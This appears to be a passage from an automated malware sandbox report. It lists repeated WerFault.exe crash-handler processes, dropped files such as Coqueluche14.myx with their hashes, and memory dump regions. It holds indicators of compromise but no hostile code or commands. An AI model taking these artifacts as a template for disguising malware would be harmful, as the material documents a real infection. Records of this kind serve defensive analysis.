  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 4252
    1⤵
      PID:932
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2428 -ip 2428
    1⤵
      PID:1040
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2008 -ip 2008
    1⤵
      PID:808
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4348 -ip 4348
    1⤵
      PID:4392
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1008 -ip 1008
    1⤵
      PID:2212
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4692 -ip 4692
    1⤵
      PID:4248
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4660 -ip 4660
    1⤵
      PID:4640
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4648 -ip 4648
    1⤵
      PID:5048
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1228 -ip 1228
    1⤵
      PID:1748
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1088 -ip 1088
    1⤵
      PID:4132
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4556 -ip 4556
    1⤵
      PID:4960
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2804 -ip 2804
    1⤵
      PID:3564
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2104 -ip 2104
    1⤵
      PID:3320
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 1700 -ip 1700
    1⤵
      PID:2132
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1556 -ip 1556
    1⤵
      PID:2420
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1680 -ip 1680
    1⤵
      PID:1540
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3292 -ip 3292
    1⤵
      PID:5100
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2260 -ip 2260
    1⤵
      PID:5060
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3340 -ip 3340
    1⤵
      PID:2360
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2436 -ip 2436
    1⤵
      PID:220
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2696 -ip 2696
    1⤵
      PID:2108
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3932 -ip 3932
    1⤵
      PID:516

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xevpyg1.cgr.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Coqueluche14.myx
    Filesize: 516KB
    MD5: 8e72b507dadf417f0f922a8cc04533d5
    SHA1: d2fb1f560d46af90f009069855dc1f94179c5b6a
    SHA256: 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c
    SHA512: cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b

  • memory/400-57-0x0000000000400000-0x0000000000424000-memory.dmp
    Filesize: 144KB

  • memory/2904-55-0x0000000000400000-0x0000000000478000-memory.dmp
    Filesize: 480KB

  • memory/3272-56-0x0000000000400000-0x0000000000462000-memory.dmp
    Filesize: 392KB

  • memory/3592-33-0x0000000006EF0000-0x0000000006F0A000-memory.dmp
    Filesize: 104KB

  • memory/3592-15-0x0000000003040000-0x0000000003076000-memory.dmp
    Filesize: 216KB

  • memory/3592-17-0x0000000005AB0000-0x0000000005AD2000-memory.dmp
    Filesize: 136KB

  • memory/3592-18-0x0000000005B50000-0x0000000005BB6000-memory.dmp
    Filesize: 408KB

  • memory/3592-19-0x00000000062D0000-0x0000000006336000-memory.dmp
    Filesize: 408KB

  • memory/3592-29-0x0000000006370000-0x00000000066C4000-memory.dmp
    Filesize: 3.3MB

  • memory/3592-30-0x0000000006960000-0x000000000697E000-memory.dmp
    Filesize: 120KB

  • memory/3592-31-0x00000000069A0000-0x00000000069EC000-memory.dmp
    Filesize: 304KB

  • memory/3592-32-0x0000000008190000-0x000000000880A000-memory.dmp
    Filesize: 6.5MB

  • memory/3592-38-0x0000000009370000-0x000000000A320000-memory.dmp
    Filesize: 15.7MB

  • memory/3592-34-0x0000000007C30000-0x0000000007CC6000-memory.dmp
    Filesize: 600KB

  • memory/3592-35-0x0000000007BC0000-0x0000000007BE2000-memory.dmp
    Filesize: 136KB

  • memory/3592-36-0x0000000008DC0000-0x0000000009364000-memory.dmp
    Filesize: 5.6MB

  • memory/3592-16-0x0000000005CA0000-0x00000000062C8000-memory.dmp
    Filesize: 6.2MB

  • memory/3824-0-0x00007FF954D03000-0x00007FF954D05000-memory.dmp
    Filesize: 8KB

  • memory/3824-40-0x00007FF954D03000-0x00007FF954D05000-memory.dmp
    Filesize: 8KB

  • memory/3824-41-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
    Filesize: 10.8MB

  • memory/3824-50-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
    Filesize: 10.8MB

  • memory/3824-12-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
    Filesize: 10.8MB

  • memory/3824-11-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
    Filesize: 10.8MB

  • memory/3824-1-0x000001FF70890000-0x000001FF708B2000-memory.dmp
    Filesize: 136KB

  • memory/4100-48-0x00000000020E0000-0x0000000003090000-memory.dmp
    Filesize: 15.7MB

  • memory/4100-90-0x0000000003260000-0x0000000003279000-memory.dmp
    Filesize: 100KB

  • memory/4100-94-0x0000000003260000-0x0000000003279000-memory.dmp
    Filesize: 100KB

  • memory/4100-93-0x0000000003260000-0x0000000003279000-memory.dmp
    Filesize: 100KB